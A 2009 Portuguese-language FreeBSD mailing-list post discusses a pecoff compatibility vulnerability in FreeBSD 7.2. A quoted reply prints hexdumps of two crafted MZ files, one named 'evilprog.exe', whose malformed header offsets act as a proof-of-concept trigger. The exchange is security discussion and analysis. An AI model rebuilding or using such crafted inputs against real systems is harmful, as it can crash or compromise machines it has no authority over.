[FUG-BR] FreeBSD 7.2 - vulnerabilidade no pecoff
Cleber Alves Nascimento
cleber em bsd.com.br
Terça Julho 21 12:33:03 BRT 2009
Só pra fins didáticos eu mandei o codigo pra um OpenBSD, compilou e executou
sem falhas exibindo no prompt: MZaaaaaaaaaaaaaa...
Eu penso que seja um exercicio de conceito mesmo, acho o pessoal não vai
perder tempo com um negocio desses, IMHO.
2009/7/21 Anderson Eduardo <anderson em hacknroll.com>
> Então..
>
> Fazendo uma pequena análise parece realmente que é a mesma falha.
>
> http://lists.freebsd.org/pipermail/freebsd-bugs/2005-May/012812.html
>
> c0d3l4bs# hexdump -C pecompat.hex
> 00000000 4d 5a 78 78 78 78 78 78 78 78 78 78 78 78 78 78
> |MZxxxxxxxxxxxxxx|
> 00000010 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78
> |xxxxxxxxxxxxxxxx|
> *
> 00000030 78 78 78 78 78 78 78 78 78 78 78 78 9c ff ff ff
> |xxxxxxxxxxxx....|
> 00000040
> c0d3l4bs# hexdump -C evilprog.exe
> 00000000 4d 5a 61 61 61 61 61 61 61 61 61 61 61 61 61 61
> |MZaaaaaaaaaaaaaa|
> 00000010 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
> |aaaaaaaaaaaaaaaa|
> *
> 00000030 61 61 61 61 61 61 61 61 61 61 61 61 ee ee ee ee
> |aaaaaaaaaaaa....|
> 00000040 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
> |aaaaaaaaaaaaaaaa|
> *
> 00000fe0
> c0d3l4bs#
> -------------------------
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
--
"Observe as estrelas e aprenda com elas." Albert Einstein
Mais detalhes sobre a lista de discussão freebsd